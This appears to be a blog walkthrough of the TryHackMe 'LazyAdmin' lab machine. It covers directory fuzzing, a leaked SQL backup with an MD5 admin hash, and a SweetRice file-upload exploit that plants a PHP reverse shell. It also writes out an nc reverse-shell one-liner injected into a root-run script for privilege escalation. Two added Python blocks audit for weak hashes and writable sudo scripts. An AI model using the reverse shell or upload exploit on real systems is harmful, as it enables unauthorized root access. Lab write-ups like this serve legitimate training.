Series of CTF machine walkthroughs #2: “LazyAdmin” (TryHackMe)

C M UPPIN, published in Techiepedia, Oct 10, 2021 (5 min read)

Hello everyone, today I'm back with an amazing CTF machine called “LazyAdmin” from TryHackMe.

Let's start.

As usual, everything starts with scanning the target using Nmap.

nmap -sC -sV -sS -p- 10.10.218.225

As the scan output above shows, two ports are open: 80 and 22.

Let's copy the IP address and paste it into the browser; you can see the default Ubuntu page.

Found nothing interesting in the page source, robots.txt or sitemaps.xml.

Now we will enumerate hidden directories using ffuf.

ffuf -w common.txt -u http://10.10.254.204/FUZZ

You can see the discovered directories above; only two of them are useful: /index.html and /content.

Found nothing on /index.html, but when you open the /content directory you can see a welcome page that says “Welcome to SweetRice”, although the page also says “the site is building now”.

So this site is running SweetRice CMS, which makes it worth checking for the login panel and the page source.

Found a /js directory and some JavaScript files in the page source, but nothing useful in those files.

So it's time to enumerate more hidden directories under /content. Let's fuzz the /content directory using ffuf.

We found 5 directories as /js, /inc, /as, /attachment and /_themes.

Found nothing useful in /js directory, /attachment and /_themes.

In the /inc directory you can see .php files and some directories; among them /mysql_backup seems interesting, so let's open it.

You can see a .sql file; download it and open it in your favourite editor.

The .sql file contains a username and password: the admin username is “manager”, and the password is stored as an MD5 hash (hashed, not encrypted). To crack it you can use online hash lookup tools (just Google it).
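The reason the backup is so useful to an attacker is the hash format: unsalted MD5 is fast to brute-force, and two users with the same password get the same stored value. The following is an added example, not code from the post or from SweetRice. It scans INSERT lines of a SQL dump and reports which password values are stored as unsalted fast hashes (MD5/SHA-1 hex), which use a proper password hash (bcrypt, argon2, pbkdf2), and which users share an identical stored value. The table layout, user names and hash values are constructed placeholders, not SweetRice's real schema or the real backup.

```python
"""Flag weakly hashed credentials in a SQL dump.

Added example, not the post's code. A dump like the one exposed under
/inc/mysql_backup is only as safe as its password column: unsalted MD5 is a
fast hash, so it is cheap to brute-force, and identical passwords yield
identical hashes. The dump and table layout below are constructed (not
SweetRice's real schema); hash values are of placeholder strings.
"""
import hashlib
import re
from collections import defaultdict

# matches one single-line INSERT statement; group 2 is the VALUES(...) body
INSERT_RE = re.compile(r"INSERT INTO `?(\w+)`?.*?VALUES\s*\((.*)\);")

WEAK_FORMATS = {"md5-unsalted", "sha1-unsalted", "plaintext-or-unknown"}


def classify_hash(value):
    """Label the storage format of a password value."""
    if re.fullmatch(r"[0-9a-fA-F]{32}", value):
        return "md5-unsalted"
    if re.fullmatch(r"[0-9a-fA-F]{40}", value):
        return "sha1-unsalted"
    if value.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if value.startswith("$argon2"):
        return "argon2"
    if value.startswith(("$pbkdf2", "pbkdf2:")):
        return "pbkdf2"
    return "plaintext-or-unknown"


def split_values(raw):
    """Split a VALUES(...) tuple; simple parser, no escaped commas or quotes."""
    return [v.strip().strip("'") for v in raw.split(",")]


def audit_dump(lines, name_col=1, pass_col=2):
    """Return one finding per inserted row: user, hash format, weak flag,
    and the other users whose stored value is identical."""
    rows = []
    for line in lines:
        m = INSERT_RE.search(line)
        if m:
            vals = split_values(m.group(2))
            rows.append((vals[name_col], vals[pass_col]))
    by_value = defaultdict(list)
    for user, stored in rows:
        by_value[stored].append(user)
    findings = []
    for user, stored in rows:
        fmt = classify_hash(stored)
        findings.append({
            "user": user,
            "format": fmt,
            "weak": fmt in WEAK_FORMATS,
            # with an unsalted hash, an identical stored value means an identical password
            "shares_password_with": [u for u in by_value[stored] if u != user],
        })
    return findings


# constructed sample: two accounts reuse one password, one uses bcrypt
MD5_REUSED = hashlib.md5(b"constructed-placeholder").hexdigest()
SAMPLE_DUMP = [
    "-- constructed sample dump, not the real backup",
    "INSERT INTO `users` (`id`,`name`,`passwd`) VALUES (1,'manager','%s');" % MD5_REUSED,
    "INSERT INTO `users` (`id`,`name`,`passwd`) VALUES (2,'editor','%s');" % MD5_REUSED,
    # format-only bcrypt placeholder, not a real hash of anything
    "INSERT INTO `users` (`id`,`name`,`passwd`) VALUES (3,'auditor',"
    "'$2b$12$placeholderplaceholderplaceholderplaceholderplace');",
]

if __name__ == "__main__":
    for finding in audit_dump(SAMPLE_DUMP):
        print(finding)
```

Run against a real dump, pass the column indexes of the user and password fields for the table in question; every `weak` row is an account whose password would fall to the same lookup the post describes, and `shares_password_with` shows password reuse that a salted hash would have hidden.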

We have a username and password, but what about the login page? There is still one more directory to look at: open the /as directory and you will get the login page.

After logging in you can see the website looks similar to WordPress, with plugins and so on.

We got the version number, so check for known vulnerabilities using searchsploit or Google. Open the terminal and run “searchsploit SweetRice 1.5.1”.

We got 5 results; 3 of them are not useful, but seeing “Arbitrary File Upload and PHP Code Execution” we can upload the RCE file and get a reverse shell. To get the RCE file, visit the PentestMonkey website.

Copy the whole page and change “IP = your VPN IP” and “Port = as you wish”; after making the changes, submit the “php-reverse-shell”.

Now open the terminal and start a listener on that port using netcat.

To get the reverse shell we have to execute the file. As we saw before, the /inc directory holds configuration files and directories, so go to /inc, open the /ads directory and click the RCE.php file; you will get the reverse shell in your terminal.

To get an interactive shell, use the Python command shown above. We got the user flag, congratulations! It's time to get the root flag, so we have to elevate privileges from user to root.

Privilege Escalation

When you list the user directories, you can see a backup.pl file that runs as the root user.

Now open backup.pl and you can see it executes the /copy.sh script; let's open that script.

The /copy.sh script contains a reverse shell command; by just changing the IP address we can get a reverse shell as root.

If you check the permissions on /copy.sh, we have write permission on it, so let's modify the script using echo and get root privileges.

You can modify the script with this command: echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.8 5554 >/tmp/f" >/etc/copy.sh, and then run the backup.pl script with sudo.

Before running the script, open the listener port using netcat.

So finally we elevated our privileges and got the root flag.

We successfully solved the “LazyAdmin” machine from TryHackMe. I'll be back with new CTF write-ups, so make sure to follow me on LinkedIn and Twitter.
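The root cause of this escalation is a sudo-runnable script (backup.pl) that calls a second script (copy.sh) writable by the low-privileged user: whoever can edit copy.sh runs commands as root. The following is an added example, not code from the post or from the machine; it is the audit a defender would run to catch that shape before it is abused. Starting from the sudo target, it follows every absolute path the script references and reports any file in the chain that is owned by the wrong user or writable by group/other. The fixture it builds in a temporary directory (the paths, the user name "someuser" and the script bodies) is constructed and hypothetical; no real system file is read or changed, and the reverse shell payload from the post is deliberately not reproduced.

```python
"""Audit a sudo-runnable script for writable dependencies.

Added example, not from the post. The escalation above works because
backup.pl, which sudo runs as root, calls copy.sh, and copy.sh is writable
by the low-privileged user. This check starts at the sudo target, follows
every absolute path the script mentions, and reports files owned by the
wrong user or writable by group/other. The fixture is built in a temporary
directory with constructed, hypothetical paths and contents.
"""
import os
import re
import stat
import tempfile

# absolute paths mentioned in a script body (shell or Perl source)
PATH_RE = re.compile(r"(?<![\w/])(/[\w./-]+)")


def writable_by_others(path):
    """True if group or other have write permission on the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def referenced_files(path, scope):
    """Regular files referenced by absolute path inside the script, limited to scope."""
    with open(path, errors="replace") as fh:
        body = fh.read()
    return [p for p in PATH_RE.findall(body)
            if p.startswith(scope) and os.path.isfile(p)]


def audit_sudo_script(entry, expected_owner_uid=0, scope="/"):
    """Return (path, problem) pairs for the entry script and everything it references."""
    findings, seen, stack = [], set(), [entry]
    while stack:
        path = stack.pop()
        if path in seen:
            continue
        seen.add(path)
        st = os.stat(path)
        if st.st_uid != expected_owner_uid:
            findings.append((path, f"owned by uid {st.st_uid}, expected {expected_owner_uid}"))
        if writable_by_others(path):
            findings.append((path, f"writable by group/other ({stat.filemode(st.st_mode)})"))
        stack.extend(referenced_files(path, scope))
    return findings


def build_fixture():
    """Recreate the misconfiguration's shape under a temp dir (constructed paths)."""
    root = tempfile.mkdtemp()
    copy_sh = os.path.join(root, "etc", "copy.sh")
    os.makedirs(os.path.dirname(copy_sh))
    with open(copy_sh, "w") as fh:
        fh.write("# placeholder body: archive the web root\n"
                 "tar -czf /var/backups/site.tgz /var/www/html\n")
    os.chmod(copy_sh, 0o777)              # the bug: anyone can edit what root will run
    backup_pl = os.path.join(root, "home", "someuser", "backup.pl")
    os.makedirs(os.path.dirname(backup_pl))
    with open(backup_pl, "w") as fh:
        fh.write(f'# run as root via sudo\nsystem("/bin/sh {copy_sh}");\n')
    os.chmod(backup_pl, 0o755)            # the root-run script itself is not writable
    return root, backup_pl, copy_sh


def demo():
    """Build the fixture and audit it; returns (findings, backup_pl, copy_sh)."""
    root, backup_pl, copy_sh = build_fixture()
    # fixture files are owned by whoever runs this, so that uid is the expected owner
    findings = audit_sudo_script(backup_pl, expected_owner_uid=os.getuid(), scope=root)
    return findings, backup_pl, copy_sh


if __name__ == "__main__":
    for path, problem in demo()[0]:
        print(f"{path}: {problem}")
```

On a real host you would call `audit_sudo_script` with each command listed in `sudo -l` output and the default `expected_owner_uid=0`; the fix for a finding like copy.sh is `chown root:root` plus `chmod 755` (or moving the helper script out of any directory the user controls), so that what sudo runs as root can only be changed by root.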

C M UPPIN (Techiepedia), Cyber Security Researcher || Security Analyst